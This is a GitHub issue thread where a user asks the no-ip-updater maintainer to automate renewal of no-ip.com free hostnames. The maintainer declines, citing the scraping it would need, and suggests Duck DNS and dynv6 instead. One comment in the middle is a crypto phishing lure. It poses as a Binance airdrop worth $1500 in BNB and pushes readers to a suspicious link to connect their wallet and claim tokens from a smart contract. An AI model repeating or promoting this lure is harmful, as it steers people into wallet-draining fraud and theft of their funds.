### ISSUE TITLE
Add a new function that renew automatically the free domain on no-ip.com periodically

### ISSUE THREAD

**Issue by bphd** [kelvinss/no-ip-updater#2]

**Comment by steinerkelvin** [comment]
Could you elaborate?

**Comment by bphd** [comment]
Avoiding [that](https://www.noip.com/support/knowledgebase/confirm-my-hostname-free-account-support-question-day/)

**Comment by steinerkelvin** [comment]
It seems this would involve web scrapping.

**Comment by bphd** [comment]
Or something else

**Comment by tobarbaro** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by steinerkelvin** [comment]
I'll close as out of scope for this package

**Comment by bphd** [comment]
> I'll close as out of scope for this package

Not really out of scope. It's the package that would be first candidate to implement such feature. It already periodically renew the IP, should renew the domain aswell

**Comment by steinerkelvin** [comment]
This package is quite lean and small.

I haven't used No-IP for several years already, but I remember vaguely that you had to log in to do this, and I don't think they are particularly interested in letting users automate this... so, it would probably involve some scraping.

If it can be done with a bunch of HTTP requests on like 400 lines of code, I would add it. But if we need to add a frigging web parsing library and multiply the size of the package by 40x for it... well, I'm not even maintaining this already.

And there are some alternatives to No-IP that don't have this problem AFAIK, like:

- [Duck DNS](https://www.duckdns.org/)
- [dynv6](https://dynv6.com/)

[steinerkelvin/k-ddns](https://github.com/steinerkelvin/k-ddns) is a tool of mine to auto-detect IP and update dynv6 similarly to this repo.

**Comment by steinerkelvin** [comment]
I've added a note on the README about these alternatives.

> Not really out of scope.

Also: repo is mine, so I define scope  :v

**Comment by bphd** [comment]
> I've added a note on the README about these alternatives.
> 
> > Not really out of scope.
> 
> Also: repo is mine, so I define scope :v

Many routers only handle few of those automatic services, often on them no-ip is the only free solution
